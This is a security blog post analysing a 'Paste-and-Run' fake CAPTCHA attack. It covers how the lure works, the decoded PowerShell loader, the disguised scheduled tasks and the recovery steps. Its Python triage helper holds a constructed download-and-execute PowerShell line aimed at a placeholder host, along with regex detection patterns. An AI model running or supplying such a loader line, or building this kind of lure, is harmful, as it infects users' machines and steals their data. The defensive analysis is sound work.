The “Paste-and-Run” Trap: A New Social Engineering Tactic I Caught in the Wild
While performing a routine security audit on a website that was showing signs of a breach, I encountered something far more sophisticated than a standard phishing link. I found a live “Paste-and-Run” infection chain.
This attack doesn’t rely on a “hidden” virus file. Instead, it uses you as the delivery mechanism. It tricks the user into manually bypassing the computer’s security layers by following a few simple steps. Here is a deep dive into how this attack works and how I analyzed the malware behind it.
Phase 1: The Social Engineering Hook
The attack presents itself as a familiar Cloudflare “Verify you are human” page. However, the checkbox is broken. It then presents “Verification Steps” that look technical but are actually instructions for a self-infection:
- Win + R: Opens the Windows “Run” dialog box.
- Ctrl + V: Pastes a command that the website has already copied to your clipboard.
- Enter: Executes the command immediately.
Because the user types the command into the Run dialog themselves, Windows treats it as an ordinary, intentional user action. The command runs outside the browser entirely, so the “sandbox” protections that modern browsers like Chrome or Edge apply to web content never come into play.
Phase 2: Decoding the Payload
During my audit, I analyzed the code that the site tried to paste into the Run box. It was a Base64-encoded PowerShell script. Attackers encode the command so that the malicious instructions never appear as readable text on the page, which lets them slip past simple content filters and antivirus signatures that inspect web traffic.
Once decoded, the script acts as a “Loader.” Its only job is to reach out to a remote server and download further, heavier malware. My analysis of the host revealed that the script was attempting to install three threats, listed here by their Microsoft Defender detection names:
- Trojan:Win64/Malgent!MSR: A primary infection tool that acts as a bridge for more malware.
- Trojan:Win64/Lazy.PGLI!MTB: A persistent backdoor that allows hackers to control your PC remotely.
- Trojan:PowerShell/Filesponger: A data-stealing script that “sponges” up your documents and passwords.
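The decoding step described above, as an added example (not the author's own analysis script): a small Python triage helper that pulls the `-EncodedCommand` argument out of a pasted command line, decodes it (PowerShell expects UTF-16LE), and flags the loader behaviours an analyst looks for. The clipboard sample is constructed here and points at the reserved `example.invalid` domain; it stands in for the real payload, which is not reproduced on this page.

```python
import base64
import re
import shlex

# Constructed sample of the kind of command a "Paste-and-Run" page writes to the
# clipboard. The inner script is a harmless stand-in; it is Base64-encoded at
# runtime exactly the way PowerShell expects it (UTF-16LE text, -enc switch).
SAMPLE_INNER = "$u='https://example.invalid/stage2.ps1'; IEX (New-Object Net.WebClient).DownloadString($u)"
SAMPLE_CLIPBOARD = ("powershell -w hidden -ep bypass -enc "
                    + base64.b64encode(SAMPLE_INNER.encode("utf-16le")).decode())

# Substrings that mark a decoded command as a loader rather than a benign script.
INDICATORS = {
    "downloads_code": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I),
    "executes_text": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-(ep|executionpolicy)\s+bypass", re.I),
}


def decode_run_box_command(cmd: str) -> dict:
    """Return the decoded inner script (if any), matched indicators and any URLs."""
    tokens = shlex.split(cmd)
    inner = None
    for i, tok in enumerate(tokens[:-1]):
        # PowerShell accepts -EncodedCommand, -ec, or any unambiguous prefix such
        # as -e / -enc (and /enc). Note that -ep is ExecutionPolicy, not a match.
        t = tok.lower().replace("/", "-", 1)
        if t == "-ec" or (len(t) >= 2 and "-encodedcommand".startswith(t)):
            raw = base64.b64decode(tokens[i + 1], validate=True)
            try:
                inner = raw.decode("utf-16le")
            except UnicodeDecodeError:
                # Some loaders hand-roll FromBase64String on plain ASCII instead.
                inner = raw.decode("utf-8", errors="replace")
            break
    text = cmd + ("\n" + inner if inner else "")
    flags = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    urls = re.findall(r"https?://[^\s'\"]+", text)
    return {"inner": inner, "flags": flags, "urls": urls}


if __name__ == "__main__":
    result = decode_run_box_command(SAMPLE_CLIPBOARD)
    print("decoded:", result["inner"])
    print("flags:  ", ", ".join(result["flags"]))
    print("urls:   ", result["urls"])
```

The URLs it extracts are the values worth blocking at the firewall and searching for in proxy logs; the flag set is what separates a genuine verification widget (which never needs any of them) from a loader.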
Phase 3: Achieving Persistence
The cleverest part of this attack is how it stays on your computer even after you restart it. This is called Persistence. By digging into the Windows Task Scheduler, I found that the malware had created several “Ghost Tasks”:
The “Logon” Strategy
I found a task named BLACK FRIDAY Task. This was set to run a malicious script the moment any user logs into the computer. By naming it after a shopping event, the attackers hope you’ll ignore it as “adware” or bloatware.
Camouflage in Plain Sight
I discovered other tasks with names like conhost, dllhost, and Internet Health Monitor. The first two are the names of genuine Windows executables, and the third sounds like a built-in service. A regular user looking at their task list would see “Internet Health Monitor” and think it’s a helpful system tool, while it’s actually the malware checking whether its connection to the attacker is still open.
Already Followed the Steps? Here is the Recovery Plan
If you have already performed the “Win + R” and “Enter” steps on a suspicious site, your computer is likely compromised. Here is exactly what I did to clean the environment during my audit:
- Cut the Connection: Immediately turn off your Wi-Fi or unplug your internet cable. This prevents the “Filesponger” script from sending your data to the hacker.
- Kill the “Run” Process: Open Task Manager (Ctrl + Shift + Esc) and look for powershell.exe or cmd.exe. Right-click and select End Task.
- Remove Scheduled Tasks: Open “Task Scheduler” and look for the names mentioned above (Internet Health Monitor, etc.). Delete any task that was created on the day the infection happened.
- Perform a Microsoft Defender Offline Scan: This is crucial. Go to Settings > Update & Security > Windows Security > Virus & threat protection > Scan options > Microsoft Defender Offline scan. Your PC will restart and scan for the virus before Windows even loads.
- Audit Your Extensions: Attackers often install hidden browser extensions to steal your passwords. Check chrome://extensions/ and remove anything you don’t recognize.
The Final Takeaway
Phishing is no longer just about clicking a link. It is now about tricking you into being the “Administrator” of your own infection. A legitimate service will never ask you to open a system box or run commands manually.
Be observant. If a website asks you to interact with your operating system to prove you are “human,” it is almost certainly a trap.